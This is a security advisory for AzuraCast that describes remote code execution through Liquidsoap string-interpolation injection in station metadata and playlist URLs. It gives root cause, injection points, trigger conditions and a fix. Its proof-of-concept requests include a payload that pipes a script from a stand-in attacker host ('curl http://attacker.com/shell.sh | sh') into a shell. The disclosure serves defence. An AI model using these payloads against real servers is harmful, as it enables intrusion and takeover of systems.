Monitor vulnerabilities like this one. Sign up free to get alerted when software you use is affected.
8.7

AzuraCast: Untrusted User Input Can Run Malicious Code

GHSA-93fx-5qgc-wr38
Summary

Authenticated users with certain permissions can inject malicious code into AzuraCast settings, allowing them to run arbitrary system commands. This can happen through user-controlled fields like playlist URLs and station metadata. To fix this, update AzuraCast to properly sanitize input to prevent code injection.

What to do
  • Update azuracast azuracast/azuracast to version 0.23.4.
Affected software
VendorProductAffected versionsFix available
azuracast azuracast/azuracast <= 0.23.4 0.23.4
Original title
AzuraCast: RCE via Liquidsoap string interpolation injection in station metadata and playlist URLs
Original description
## Summary

AzuraCast's `ConfigWriter::cleanUpString()` method fails to sanitize Liquidsoap string interpolation sequences (`#{...}`), allowing authenticated users with `StationPermissions::Media` or `StationPermissions::Profile` permissions to inject arbitrary Liquidsoap code into the generated configuration file. When the station is restarted and Liquidsoap parses the config, `#{...}` expressions are evaluated, enabling arbitrary command execution via Liquidsoap's `process.run()` function.

## Root Cause

**File:** `backend/src/Radio/Backend/Liquidsoap/ConfigWriter.php`, line ~1345

```php
public static function cleanUpString(?string $string): string
{
return str_replace(['"', "\n", "\r"], ['\'', '', ''], $string ?? '');
}
```

This function only replaces `"` with `'` and strips newlines. It does **NOT** filter:
- `#{...}` — Liquidsoap string interpolation (evaluated as code inside double-quoted strings)
- `\` — Backslash escape character

Liquidsoap, like Ruby, evaluates `#{expression}` inside double-quoted strings. `process.run()` in Liquidsoap executes shell commands.

## Injection Points

All user-controllable fields that pass through `cleanUpString()` and are embedded in double-quoted strings in the `.liq` config:

| Field | Permission Required | Config Line |
|---|---|---|
| `playlist.remote_url` | `Media` | `input.http("...")` or `playlist("...")` |
| `station.name` | `Profile` | `name = "..."` |
| `station.description` | `Profile` | `description = "..."` |
| `station.genre` | `Profile` | `genre = "..."` |
| `station.url` | `Profile` | `url = "..."` |
| `backend_config.live_broadcast_text` | `Profile` | `settings.azuracast.live_broadcast_text := "..."` |
| `backend_config.dj_mount_point` | `Profile` | `input.harbor("...")` |

## PoC 1: Via Remote Playlist URL (Media permission)

```http
POST /api/station/1/playlists HTTP/1.1
Content-Type: application/json
Authorization: Bearer <API_KEY_WITH_MEDIA_PERMISSION>

{
"name": "Malicious Remote",
"source": "remote_url",
"remote_url": "http://x#{process.run('id > /tmp/pwned')}.example.com/stream",
"remote_type": "stream",
"is_enabled": true
}
```

The generated `liquidsoap.liq` will contain:
```liquidsoap
mksafe(buffer(buffer=5., input.http("http://x#{process.run('id > /tmp/pwned')}.example.com/stream")))
```

When Liquidsoap parses this, `process.run('id > /tmp/pwned')` executes as the `azuracast` user.

## PoC 2: Via Station Description (Profile permission)

```http
PUT /api/station/1/profile/edit HTTP/1.1
Content-Type: application/json
Authorization: Bearer <API_KEY_WITH_PROFILE_PERMISSION>

{
"name": "My Station",
"description": "#{process.run('curl http://attacker.com/shell.sh | sh')}"
}
```

Generates:
```liquidsoap
description = "#{process.run('curl http://attacker.com/shell.sh | sh')}"
```

## Trigger Condition

The injection fires when the station is restarted, which happens during:
- Normal station restart by any user with `Broadcasting` permission
- System updates and maintenance
- `azuracast:radio:restart` CLI command
- Docker container restarts

## Impact

- **Severity:** Critical
- **Authentication:** Required — any station-level user with `Media` or `Profile` permission
- **Impact:** Full RCE on the AzuraCast server as the `azuracast` user
- **CWE:** CWE-94 (Code Injection)

## Recommended Fix

Update `cleanUpString()` to escape `#` and `\`:

```php
public static function cleanUpString(?string $string): string
{
return str_replace(
['"', "\n", "\r", '\\', '#'],
['\'', '', '', '\\\\', '\\#'],
$string ?? ''
);
}
```
osv CVSS3.1 8.7
Vulnerability type
CWE-94 Code Injection
Published: 9 Mar 2026 · Updated: 13 Mar 2026 · First seen: 9 Mar 2026